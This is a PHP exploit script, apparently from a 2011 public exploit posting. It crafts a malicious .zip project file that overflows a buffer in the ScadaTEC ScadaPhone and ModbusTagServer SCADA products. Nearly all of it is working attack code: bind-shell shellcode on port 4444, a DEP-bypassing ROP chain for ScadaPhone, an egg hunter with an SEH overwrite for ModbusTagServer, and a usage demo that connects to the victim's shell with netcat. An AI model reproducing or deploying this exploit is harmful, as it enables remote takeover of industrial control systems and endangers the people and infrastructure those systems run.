1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179 | <?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ScadaTEC ModbusTagServer & ScadaPhone (.zip) buffer overflow exploit (0day)
Date: 09/09/2011
Author: mr_me (@net__ninja)
Vendor: http://www.scadatec.com/
ScadaPhone Version: <= 5.3.11.1230
ModbusTagServer Version: <= 4.1.1.81
Tested on: Windows XP SP3 NX=AlwaysOn/OptIn
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Notes:
- The ScadaPhone exploit is a DEP bypass under windows XP sp3 only
- The ModbusTagServer exploit does not bypass dep
- To trigger this vulnerability, you must 'load' a project from a zip file.
Feel free to improve it if you want. Example usage:
[mr_me@neptune scadatec]$ php zip.php -t scadaphone
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ScadaPhone\Projects>
[mr_me@neptune scadatec]$ php zip.php -t modbustagserver
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ModbusTagServer\Projects>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'The reason they call it the American Dream is because you have to be asleep
to believe it.' ~ George Carlin
*/
if ($argc < 3) {
print_r("
-----------------------------------------------------------------------------
Usage: php ".$argv[0]." -t <software>
software: target software
Example:
php ".$argv[0]." -t scadaphone
php ".$argv[0]." -t modbustagserver
-----------------------------------------------------------------------------
"); die; }
function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$reg[1]] = $reg[2];
}elseif(ereg("^-([a-zA-Z0-9])", $arg, $reg)){
$_ARG[$reg[1]] = "true";
}else {
$_ARG["input"][] = $arg;
}
}
return $_ARG;
}
$myArgs = setArgs($argv);
$target = $myArgs["input"]["1"];
$lf_header = "\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";
$cdf_header = "\x50\x4b\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
$efcdr_record = "\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";
$___offset = 4064;
// bind shell on port 4444
$___sc = "\x90\x90\x90\x90".
"\xd9\xc7\xb8\x94\x32\x09\x43\xd9\x74\x24\xf4\x5b\x31\xc9\xb1".
"\x56\x31\x43\x18\x83\xeb\xfc\x03\x43\x80\xd0\xfc\xbf\x40\x9d".
"\xff\x3f\x90\xfe\x76\xda\xa1\x2c\xec\xae\x93\xe0\x66\xe2\x1f".
"\x8a\x2b\x17\x94\xfe\xe3\x18\x1d\xb4\xd5\x17\x9e\x78\xda\xf4".
"\x5c\x1a\xa6\x06\xb0\xfc\x97\xc8\xc5\xfd\xd0\x35\x25\xaf\x89".
"\x32\x97\x40\xbd\x07\x2b\x60\x11\x0c\x13\x1a\x14\xd3\xe7\x90".
"\x17\x04\x57\xae\x50\xbc\xdc\xe8\x40\xbd\x31\xeb\xbd\xf4\x3e".
"\xd8\x36\x07\x96\x10\xb6\x39\xd6\xff\x89\xf5\xdb\xfe\xce\x32".
"\x03\x75\x25\x41\xbe\x8e\xfe\x3b\x64\x1a\xe3\x9c\xef\xbc\xc7".
"\x1d\x3c\x5a\x83\x12\x89\x28\xcb\x36\x0c\xfc\x67\x42\x85\x03".
"\xa8\xc2\xdd\x27\x6c\x8e\x86\x46\x35\x6a\x69\x76\x25\xd2\xd6".
"\xd2\x2d\xf1\x03\x64\x6c\x9e\xe0\x5b\x8f\x5e\x6e\xeb\xfc\x6c".
"\x31\x47\x6b\xdd\xba\x41\x6c\x22\x91\x36\xe2\xdd\x19\x47\x2a".
"\x1a\x4d\x17\x44\x8b\xed\xfc\x94\x34\x38\x52\xc5\x9a\x92\x13".
"\xb5\x5a\x42\xfc\xdf\x54\xbd\x1c\xe0\xbe\xc8\x1a\x2e\x9a\x99".
"\xcc\x53\x1c\x0c\x51\xdd\xfa\x44\x79\x8b\x55\xf0\xbb\xe8\x6d".
"\x67\xc3\xda\xc1\x30\x53\x52\x0c\x86\x5c\x63\x1a\xa5\xf1\xcb".
"\xcd\x3d\x1a\xc8\xec\x42\x37\x78\x66\x7b\xd0\xf2\x16\xce\x40".
"\x02\x33\xb8\xe1\x91\xd8\x38\x6f\x8a\x76\x6f\x38\x7c\x8f\xe5".
"\xd4\x27\x39\x1b\x25\xb1\x02\x9f\xf2\x02\x8c\x1e\x76\x3e\xaa".
"\x30\x4e\xbf\xf6\x64\x1e\x96\xa0\xd2\xd8\x40\x03\x8c\xb2\x3f".
"\xcd\x58\x42\x0c\xce\x1e\x4b\x59\xb8\xfe\xfa\x34\xfd\x01\x32".
"\xd1\x09\x7a\x2e\x41\xf5\x51\xea\x71\xbc\xfb\x5b\x1a\x19\x6e".
"\xde\x47\x9a\x45\x1d\x7e\x19\x6f\xde\x85\x01\x1a\xdb\xc2\x85".
"\xf7\x91\x5b\x60\xf7\x06\x5b\xa1";
if(strcmp($target,"scadaphone") === 0){
// add esp 418; retn
$___pivot = "\x0b\x33\xc6\x01";
$___jmp = "\xeb\x06HI";
$___rop = "";
$___rop .=
"\x1c\x05\x03\x10". // xor edx,edx; retn
"\xa2\xce\x02\x10". // pop eax; retn
"\xf4\x11\x6e\x6d". // &VirtualProtect
"\xa9\x4e\x01\x10". // mov eax,[eax]; retn
"\xd7\xbf\x01\x10". // push eax; mov eax,[edx*4+10036948]; and eax,esi; pop esi; pop ebx; retn
"\xc0\xff\xff\xff". // special sauce ----------------------------------------------^^
"\x1e\xe0\x02\x10". // add edx,ebx; pop ebx; retn 10
"LOLZ". // junk
"\xea\x37\xc6\x01". // neg edx; neg eax; sbb edx,0; pop ebx; retn 10
"CAFEBABE". // junk
"CAFEBABE". // junk
"\xbf\x52\xc6\x01". // .data writable ------------------^^
"\xa2\xce\x02\x10". // pop eax; retn
"CAFEBABE". // junk
"CAFEBABE". // junk
"\x17\x32\xc6\x01". // ptr to 0x400
"\xa9\x4e\x01\x10". // mov eax,[eax]; retn
"\xe4\x85\x02\x10". // xchg eax,ebx; add dl,[eax]; mov [eax+8],11; mov eax,13; retn
"\xa2\xce\x02\x10". // pop eax; retn
"\x90\x90\x90\x90". // nops
"\x53\x54\x10\x10". // pop edi; retn
"\x54\x54\x10\x10". // retn
"\x01\xec\x02\x10". // pop ecx; retn
"\xc0\x52\xc6\x01". // .data writable
"\x03\xc0\x17\x10". // pop ebp; retn
"\x44\xcb\x2b\x10". // ptr to 'push esp; ret'
"\xb7\xc9\x27\x10"; // pushad; retn
$___exploit = str_repeat("\x41",57).
$___rop;
$___exploit .= str_repeat("\x90",277-strlen($___exploit)).
$___jmp.
$___pivot.
$___sc;
$___exploit .= str_repeat("\x41",$___offset-strlen($___exploit))."\x1e\x74\x78\x74";
}else if(strcmp($target,"modbustagserver") === 0) {
$__hunter = "\x66\x81\xcA\xff\x0f\x42\x52\x6a".
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8".
"OMFG".
"\x8b\xfa\xaf\x75\xeA\xaf\x75\xe7\xff\xe7";
$___nseh = "\xeb\xceHI";
// pop esi; pop ebx; retn
$___seh = "\xac\x14\x40\x00";
$___exploit = str_repeat("\x41",229).
$__hunter.
str_repeat("\x44",48-strlen($__hunter)).
$___nseh.
$___seh.
str_repeat("\x44",100).
"OMFGOMFG".
$___sc;
$___exploit .=
str_repeat("\x41",$___offset-strlen($___exploit))."\x1e\x74\x78\x74";
}else{
exit(0);
}
$_____boom = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("scadatec.zip",$_____boom);
?>
|